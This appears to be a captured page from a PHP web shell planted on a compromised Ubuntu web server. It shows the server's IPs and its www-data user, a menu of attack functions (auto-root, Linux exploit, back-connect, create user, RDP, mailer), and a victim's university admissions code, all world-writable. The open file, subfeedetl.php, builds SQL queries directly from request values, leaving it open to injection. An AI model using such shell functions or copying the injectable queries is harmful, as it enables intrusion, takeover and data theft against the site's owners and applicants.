Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.188.130.151
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
dud /
adm /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
applicationFormReportPOSTOFFIC...
19.27
KB
-rwxrwxrwx
applicationFormReportSBM.php
8.41
KB
-rwxrwxrwx
caccesscontext.php
1.24
KB
-rwxrwxrwx
cappcontext.php
2.66
KB
-rwxrwxrwx
code39.php
6.38
KB
-rwxrwxrwx
coutput.php
1.76
KB
-rwxrwxrwx
crequestbroker.php
2.49
KB
-rwxrwxrwx
csessions.php
514
B
-rwxrwxrwx
cuser.php
3.41
KB
-rwxrwxrwx
customappcontext.php
2.35
KB
-rwxrwxrwx
dropdown.php
844
B
-rwxrwxrwx
format.php
7.43
KB
-rwxrwxrwx
fpdf_protection.php
5.61
KB
-rwxrwxrwx
getdata.php
1.06
KB
-rwxrwxrwx
getnumword.php
7.15
KB
-rwxrwxrwx
json.php
33.2
KB
-rwxrwxrwx
kusphdadm.php
22.17
KB
-rwxrwxrwx
kusphdadm_02012019.php
17.81
KB
-rwxrwxrwx
kusphdadm_19082019.php
17.88
KB
-rwxrwxrwx
mregistry.php
3.83
KB
-rwxrwxrwx
re_rigistration.php
7.38
KB
-rwxrwxrwx
report_bulk_applications.php
24.21
KB
-rwxrwxrwx
report_bulk_applications_19082...
23.5
KB
-rwxrwxrwx
report_hall_ticket.php
11.31
KB
-rwxrwxrwx
reportapplicationform - Copy.p...
19.59
KB
-rwxrwxrwx
reportapplicationform.php
23.92
KB
-rwxrwxrwx
rotation.php
596
B
-rwxrwxrwx
saveApplication.php
8.91
KB
-rwxrwxrwx
saveRerigistration.php
10.87
KB
-rwxrwxrwx
student.php
14.89
KB
-rwxrwxrwx
student_19082019.php
14.75
KB
-rwxrwxrwx
student_24092018.php
13.3
KB
-rwxrwxrwx
subfeedetl.php
3.39
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subfeedetl.php
<?php function getdropdownmenuvalues($aobj_context) { $exam = 'A'; $query = "SELECT distinct fdegree AS int_code, fdescpn AS val FROM degree where ifnull(FFACCODE,'') = 'UG' and fexamno = '{$exam}' and ifnull(fadmdeg,'') = 'T'"; $result = $aobj_context->mobj_db->GetAll($query); $arr['UG'] = $result; $query = "select fdegree,group_concat(distinct fcombcode,'->',fcombdesc) as combination from mascomb group by fdegree"; $result5=$aobj_context->mobj_db->GetAll($query); $arr['combcode']=$result5; $query = "select fdegree,ifnull(FMEDIUM,'') as medium from degree where ifnull(fadmdeg,'') = 'T' and fexamno = 'A'"; $result = $aobj_context->mobj_db->GetAll($query); $arr['medium']=$result; $query = "select distinct fcollcode as int_code, concat(fcollcode,' - ',fcollname,',',ftown) as val from college where fcollcode in ('1001')"; $result =$aobj_context->mobj_db->GetAll($query); $arr['centercode']=$result; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } function getsubjectdet($aobj_context) { $degree = trim($aobj_context->mobj_data['degree']); $exam = 'A'; $query = "select fsubcode, fsubname from subject where fdegree = '{$degree}' and fexamno = 'A' and fintass = 'F' limit 3"; //var_dump($query); $result = $aobj_context->mobj_db->GetAll($query); $html = "<div class='row'><center><div class=' col-md-offset-2 col-md-8'><table id='mainTable' class='table table-striped table-condensed table-bordered'> <thead> <tr class='bg-cyan'> <th style = 'width:8%;'><center>Sl. No.</center></th> <th style = 'width:12%;'><center>Sub. Code</center></th> <th style = 'width:70%;'>Subject Name</th> </tr> </thead> <tbody>"; $i = 1; if(count($result)>0) { $subject = array(); foreach($result as $key => $value) { $html .="<tr>"; $html .="<td style = 'width:;'> <span><center>{$i}</center></span> </td>"; $html .="<td style = 'width:;'> <center>{$value['fsubcode']}</center> </td>"; $subject[$i] = $value['fsubcode']; $html .="<td style = 'width:;'> <span style=''>{$value['fsubname']}</span> </td>";; $html .="</tr>"; $i++; } } else { $html .="<tr>"; $html .="<td colspan = '3'><center>NO SUBJECT DETAILS FOUND</center></td>"; $html .="</tr>"; } $html .= "</tbody></table></div><center></div>"; $arr['html']=$html; $arr['subject'] = $subject; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } function getfeedetl($aobj_context) { $category = trim($aobj_context->mobj_data['category']); $query = "select fphdadmfee from category where fcategory = '{$category}'"; $result = $aobj_context->mobj_db->GetRow($query); $arr['sum'] = $result['fphdadmfee']; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } ?>
Close